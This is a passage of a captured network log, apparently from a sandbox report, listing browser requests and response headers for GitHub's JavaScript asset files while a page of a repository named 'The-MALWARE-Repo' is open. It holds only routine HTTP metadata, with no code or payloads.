cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e1bc9f2a988c298734624f19bd01ad4482f141d1
content-length: 3083
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-21948f72ce0b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-21948f72ce0b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 05 Mar 2025 20:19:48 GMT
etag: "0x8DD5C23140C73E2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 521240
x-served-by: cache-iad-kcgs7200084-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 133, 8535
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cf17a612ee05a4ca926e57c480e0e92ad7a9e4dd
content-length: 4510
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-e429cff6ceb1.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-e429cff6ceb1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 28 Feb 2025 22:32:54 GMT
etag: "0x8DD5847D7A8C489"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 696617
x-served-by: cache-iad-kjyo7100077-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 110, 11432
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e7d271e15bb454f38740bf9b07e774c3bb5fa3ab
content-length: 6872
GET

https://github.githubassets.com/assets/behaviors-fcae38dacb59.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/behaviors-fcae38dacb59.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 22:52:24 GMT
etag: "0x8DD5DCABA65B4D9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 43122
x-served-by: cache-iad-kjyo7100031-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 11, 1245
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cd6e89ac50abd9fd02b5d9b067770fb66a08b592
content-length: 61271
GET

https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:21 GMT
etag: "0x8DD55031CA06860"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297404
x-served-by: cache-iad-kiad7000106-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 153, 16705
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5ea51aee098d05e02fc9b270c51a42c2d06e96eb
content-length: 3363
GET

https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/notifications-global-01e85cd1be94.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:20 GMT
etag: "0x8DD55031C53893A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297404
x-served-by: cache-iad-kiad7000146-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 151, 16708
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 43fa9fae2739ff2ca916441534db93a81749dcfc
content-length: 3112
GET

https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-94dc7a2157c1.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-94dc7a2157c1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 14:39:53 GMT
etag: "0x8DD0D5F064BBD59"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3674923
x-served-by: cache-iad-kiad7000150-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 21344, 7783
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 38f81807421f134dd99fe9293f6ded48d2486aa1
content-length: 4975
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 20 Feb 2025 22:50:49 GMT
etag: "0x8DD52010557AFC3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1585024
x-served-by: cache-iad-kiad7000074-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 3992, 11006
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5f747a6d87933a31f91e0fcc5c96cc7441e51f07
content-length: 3989
GET

https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-3e9d848bab5f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_ref-selector_ts-3e9d848bab5f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 21 Feb 2025 22:10:48 GMT
etag: "0x8DD52C49873BAE7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297378
x-served-by: cache-iad-kjyo7100146-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 152, 11404
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4870c6aa0f153908e240982acd512a4aaefcc216
content-length: 5097
GET

https://github.githubassets.com/assets/codespaces-c3bcacfe317c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/codespaces-c3bcacfe317c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FC3AE69"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3073493
x-served-by: cache-iad-kcgs7200159-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4330, 9545
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 59dd677a4f46673c3b684cf5549346b48a69f9b7
content-length: 6126
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 05 Mar 2025 20:19:53 GMT
etag: "0x8DD5C2316CBB8A8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 521236
x-served-by: cache-iad-kjyo7100094-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 79, 4748
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5bf699dc48d7bb12ca9efad15c816554722c75ec
content-length: 5533
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FC02FE8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3612342
x-served-by: cache-iad-kiad7000022-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 14718, 7996
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dc0be4c5c9b9ce850fca8bf47024032a84f6e9bd
content-length: 3500
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Sat, 16 Nov 2024 19:35:21 GMT
etag: "0x8DD0675CF86BAD9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3595609
x-served-by: cache-iad-kiad7000054-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 5704, 8883
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ddae7ea6e2612c1795ceb9734c13bb83aacab450
content-length: 4341
GET

https://github.githubassets.com/assets/repositories-7a0dbaa42c57.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/repositories-7a0dbaa42c57.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:36 GMT
etag: "0x8DD550325B4F233"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297378
x-served-by: cache-iad-kjyo7100037-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 106, 9104
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c4025139768fe156069db7affcf82cdde7f4a8a3
content-length: 16347
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 21 Feb 2025 22:10:49 GMT
etag: "0x8DD52C49957C2F5"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297404
x-served-by: cache-iad-kjyo7100035-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 127, 9894
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3fef06194ff5a13f5e55375222b0a8e99ac3b60d
content-length: 3532
GET

https://github.githubassets.com/assets/code-menu-1c0aedc134b1.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/code-menu-1c0aedc134b1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 01:30:47 GMT
etag: "0x8DD3F3B64406EA2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2976277
x-served-by: cache-iad-kjyo7100087-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 15, 15370
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 025d37df8306a415069fd503551b3613c42da60c
content-length: 16517
GET

https://github.githubassets.com/assets/primer-react-d4f7d0473d87.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/primer-react-d4f7d0473d87.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:56 GMT
etag: "0x8DD4BAB23D5B1F6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2199443
x-served-by: cache-iad-kjyo7100091-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 10013, 16061
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 18d5bf77a9f69e4bb61069be42f16016cc507f14
content-length: 56524
GET

https://github.githubassets.com/assets/react-core-f3d7926d544b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/react-core-f3d7926d544b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 17:20:59 GMT
etag: "0x8DD60C1176171A8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 19690
x-served-by: cache-iad-kiad7000044-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 38, 350
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1aa6ed5d448b7a0f93b50efe83ff43acc5d18751
content-length: 46295
GET

https://github.githubassets.com/assets/react-lib-f1bca44e0926.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/react-lib-f1bca44e0926.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 15:32:27 GMT
etag: "0x8DD0D665E7C17D4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1256910
x-served-by: cache-iad-kcgs7200094-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 32, 8852
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c4ce86cf4adddca6e7131348ae82bef38b916085
content-length: 2646
GET

https://github.githubassets.com/assets/octicons-react-611691cca2f6.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/octicons-react-611691cca2f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 20 Feb 2025 00:53:57 GMT
etag: "0x8DD51490E7B2454"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 505640
x-served-by: cache-iad-kcgs7200087-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 65, 8636
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 82e5683c6bdb4997262615f3b3c1ce915c99e980
content-length: 112275
GET

